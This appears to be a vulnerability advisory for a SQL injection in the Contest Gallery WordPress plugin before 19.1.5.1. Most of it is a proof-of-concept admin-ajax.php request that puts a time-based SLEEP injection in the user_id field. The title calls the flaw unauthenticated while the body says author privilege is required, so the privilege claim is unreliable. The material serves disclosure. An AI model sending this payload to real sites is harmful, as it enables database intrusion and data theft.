Contest Gallery < 19.1.5.1 - Unauthenticated SQL Injection

The plugins do not escape the user_id POST parameter before concatenating it to an SQL query in ajax-functions-backend.php. This may allow malicious users with at least author privilege to leak sensitive information from the site’s database.

PoC

POST /wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost:8080/wp-admin/profile.php X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5167035403431582548369588705 Content-Length: 2816 Origin: http://localhost:8080 Connection: close Cookie: wordpress_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C92b6fd388ba13304a4e6d05bb993994b73e939c69f835a5f48832fd667db6a41; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C4a47ea962cf6ef424f4c85c035f566bcefb106dac5c9061bff96ab380af53d60; wp-settings-time-3=1668298491 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“_wpnonce” 5c8402bea9 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“cg_input_image_upload_file_to_delete_wp_id” 1 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“_wp_http_referer” /wp-admin/profile.php -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“from” profile -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“checkuser_id” 3 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“color-nonce” 6f0655e068 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“admin_color” fresh -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“admin_bar_front” 1 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“first_name” -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“last_name” -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“nickname” test1 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“display_name” test1 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“email” [email protected] -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“url” -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“description” -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“pass1” -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“pass2” -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“cg_user_data_available” true -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“cg_user_id” 3 -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“action” post_cg_backend_image_upload -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“cg_input_image_upload_file[]”; filename=“index.png” Content-Type: text/plain TEST -----------------------------5167035403431582548369588705 Content-Disposition: form-data; name=“user_id” 3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu) -----------------------------5167035403431582548369588705–